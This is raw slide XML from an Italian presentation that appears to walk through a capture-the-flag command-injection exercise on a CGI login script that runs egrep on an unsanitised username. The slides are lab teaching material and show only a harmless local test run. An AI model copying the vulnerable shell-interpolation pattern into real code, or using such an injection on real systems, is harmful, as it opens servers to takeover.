                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      (se invocato tramite un server web)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="011635"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396431777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1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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Google Shape;1840;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260120" y="845540"/>
            <a:ext cx="1284600" cy="12846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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234334" y="2352675"/>
            <a:ext cx="3872041" cy="194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9300">
                <a:solidFill>
                  <a:srgbClr val="00CFBE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOLUZIONE</a:t>
            </a:r>
            <a:endParaRPr sz="9300">
              <a:solidFill>
                <a:srgbClr val="00CFBE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843" name="Google Shape;1843;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283220" y="845540"/>
            <a:ext cx="1261500" cy="1284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02</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene diagramma&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06AEE2F6-1C8C-AF27-A9C7-EB078A0A123A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5553942" y="1071130"/>
            <a:ext cx="3292186" cy="3292186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1964578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Google Shape;1840;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260120" y="845540"/>
            <a:ext cx="1284600" cy="12846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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283220" y="845540"/>
            <a:ext cx="1261500" cy="1284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02</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene diagramma&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06AEE2F6-1C8C-AF27-A9C7-EB078A0A123A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5553942" y="1071130"/>
            <a:ext cx="3292186" cy="3292186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;1841;p61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27360981-C201-21AA-7442-70E21058C1C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283220" y="2304184"/>
            <a:ext cx="3872041" cy="194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800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INIEZIONE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="9300"/>
              <a:t>LOCALE</a:t>
            </a:r>
            <a:endParaRPr sz="9300"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2133174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6" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AEA2122-48B6-A0D6-B50B-3BBB8ACBA659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798799" y="2481182"/>
            <a:ext cx="7703999" cy="52264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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il risultato è quanto segue:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="011635"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63D0AFC9-AB9E-EB0C-DBE9-958CC9F683EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888295" y="1146828"/>
            <a:ext cx="7703999" cy="522646"/>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it-IT" sz="1400" dirty="0"/>
              <a:t>Eseguiamo lo script in locale, tramite il passaggio diretto dei due argomenti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>username=user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>password= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="011635"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1392014" y="483422"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>secuzione locale</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9855D80B-EEC3-BEEB-5006-8108AC01A9D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="2935" b="23579"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="948829" y="3111633"/>
            <a:ext cx="7001518" cy="1051657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D28A35E7-8615-8C8B-43DE-50BCCC9312F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888295" y="1488862"/>
            <a:ext cx="7703999" cy="52264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0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Autentichiamoci come level16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="011635"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43487CFA-112E-0D20-E49C-34913DD71BC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888295" y="2031867"/>
            <a:ext cx="7703999" cy="64606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a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Digitiamo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username=«user» password=«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="011635"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7839640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fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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450" name="Google Shape;1450;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408693" y="499658"/>
            <a:ext cx="64122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it-IT" sz="3200" dirty="0"/>
              <a:t>Un primo tentativo</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Google Shape;1469;p54"/>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4"/>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4"/>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1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113C3EE9-131C-2C30-ECA8-283D8C653A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="1119495"/>
            <a:ext cx="7578315" cy="469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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Anche se non viene visualizzato nulla è stato eseguito il comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>egrep "^$username" /home/flag16/userdb.txt 2&gt;&amp;1</a:t>
            </a:r>
          </a:p>
          <a:p>
